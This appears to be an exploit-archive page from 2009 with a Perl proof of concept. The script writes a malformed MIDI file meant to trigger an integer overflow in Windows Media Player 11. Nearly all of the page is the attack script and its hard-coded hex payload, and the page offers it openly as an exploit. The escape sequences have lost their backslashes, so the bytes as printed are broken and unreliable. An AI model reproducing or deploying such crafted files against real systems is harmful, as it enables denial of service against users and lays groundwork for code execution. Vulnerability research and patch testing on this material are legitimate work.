MS Windows Media Player (.mid File) Integer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Windows Media Player (.mid File) Integer Overflow PoC
# Published : 2009-04-15
# Author : HuoFu
# Previous Title : MagicISO CCD/Cue Local Heap Overflow Exploit PoC
# Next Title : Zervit Webserver 0.02 Remote Buffer Overflow PoC

#! /usr/bin/perl
#
# Windows Media Player (.mid file) Integer Overflow PoC
# By HuoFu
#
# Test Windows Media Player.  Ver: 11.0.5721.5260
#

open(Fin, ">crash.mid") || die "can't create crash sample.$!";

$data = "x4dx54x68x64x00x00x00x06x00x01x00x01x00x60x4dx54".
"x72x6bx00x00x00x4ex00xffx03x08x34x31x33x61x34x61".
"x35x30x00x91x41x60x01x3ax60x01x4ax60x01x50x60x7d".
"x81x41x01x01x3ax5fx8dxe4xa0x01x50x01x3dx91x41x60".
"x81x00x81x41x40x00x91x3ax60x81x00x76x6fxccx3dxa6".
"xc2x48xeex8excaxc2x57x00x91x50x60x81x00x81x50x40".
"x00xffx2fx00";

print Fin $data;

close(Fin);

# www.Syue.com [2009-04-15]